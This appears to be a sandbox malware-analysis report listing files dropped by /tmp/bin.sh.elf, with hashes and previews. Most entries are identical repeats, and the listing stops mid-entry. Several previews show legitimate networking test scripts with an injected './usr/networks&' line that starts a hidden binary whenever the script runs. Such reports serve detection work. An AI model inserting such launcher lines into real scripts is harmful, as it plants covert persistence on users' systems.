                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):18782
                                                                  Entropy (8bit):5.235983173566899
                                                                  Encrypted:false
                                                                  SSDEEP:192:WjE48X8gWbotdJrGMNlV1JG8IHpfLwFWpzvwdGU7r/tkTVQj8uFOmCyip1k54eDY:94PeyLwFWpcEU74VQR4e71i
                                                                  MD5:33D5377637217EAE06E98E33FC04B188
                                                                  SHA1:59C6E042FAA5A655305E0C8A0CE83EDAAF0F8D7B
                                                                  SHA-256:8310B79376659E0CCAA87FF0BA252CA3F8A944504EAE0CDE638654B6403EF517
                                                                  SHA-512:FFDC2D40A04DE6FDAF756CE983EC57986F12FF70600CC560A7F257849ABB0D35C6C8D71C0582EE9E36AF8F94C166F3315775F40529320E568818216BDDCB1C0A
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit 1..fi.}..check_tc_shblock_support().{..tc filter help 2>&1 | grep block &> /dev/null..if [[ $? -ne 0 ]]; then...echo "SKIP: iproute2 too old; tc is missing shared block support"...exit 1..fi.}..check_tc_chain_support().{..tc help 2>&1|grep chain &> /dev/null..if [[ $? -ne 0 ]]; then...echo "SKIP: iproute2 too old; tc is missing chain support"...exit 1..fi.}..if [[ "$(id -u)" -ne 0 ]]; then..echo "SKIP: need root privileges"..exit 0.fi..if [[ "$CHECK_TC" = "yes" ]]; then..check_tc_version.fi..require_command().{..local cmd=$1; shift...if [[ ! -x "$(command -v "$cmd")" ]]; then...echo "SKIP: $cmd not installed"...exit 1..fi.}..require_command jq.require_command $MZ..if [[ ! -v NUM_NETIFS ]]; then..echo "SKIP: importer does not define \"NUM_NETIFS\""..exit 1.fi..##############################################################################.# Command line options handling..count=0..while [[ $# -gt 0 ]]; do..if [[ "$count" -eq "0" ]]; then...unset NETIFS...declare -A
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):205
                                                                  Entropy (8bit):4.7396662996751076
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVPnKWoW6MKH57FrLQVG6xRXt6XXHBEkVAv6VFedQVLpvyoYxvMRvOWvQLk9bJT:cnKWcP4NRX2ykiv+YdQfUx1gxJjWMn
                                                                  MD5:638F9D3F209476CE9B175236635D4DB8
                                                                  SHA1:B9A3FCA663B97909DCDEABA1DCF9259AB2E77E29
                                                                  SHA-256:AF4CB5CF32617176768E4A6E6C6CF986BA074EFA1125DAF25630321CAF468938
                                                                  SHA-512:176FB4049BFEBE70A2FA8FEA09F0A0F0DB258AD711AB93FFACCF51B4B9ECC3CA386A626B8B876281230C3A4F4E767E391B18B755B70B0CAC85CA222E02FD58FE
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit $ksft_skip..fi.}..cleanup().{..pre_cleanup...h2_destroy..h1_destroy...vrf_cleanup.}..trap cleanup EXIT..setup_prepare.setup_wait..tests_run..exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):140
                                                                  Entropy (8bit):4.630000937813715
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVaBQBEvedQVLpvyoYxvMRvbY6K3OmQLk9bJjWXVOORgn:wDdQfUxMa3OngxJjWMn
                                                                  MD5:864C0B993466007E84B2C18EC3BFC6F2
                                                                  SHA1:A714DC923D9DB001F3AD2DA05A9C617875335F85
                                                                  SHA-256:209EDFC7B23AC287C7403F7ABEEE52FE743C44B97C606201F940199C066CE312
                                                                  SHA-512:E023083DCF81C1038870F27210C9A526574BD1249DE23754EF9661D37DB94F6FFF3DC3308C65830B04C899B5B4434A7519024716DE9BB2019A408224055C104B
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 0.fi..trap cleanup EXIT..setup_prepare.setup_wait.routing_nh_obj..tests_run..exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
                                                                  Entropy (8bit):4.424738040366664
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                  MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                  SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                  SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                  SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):57
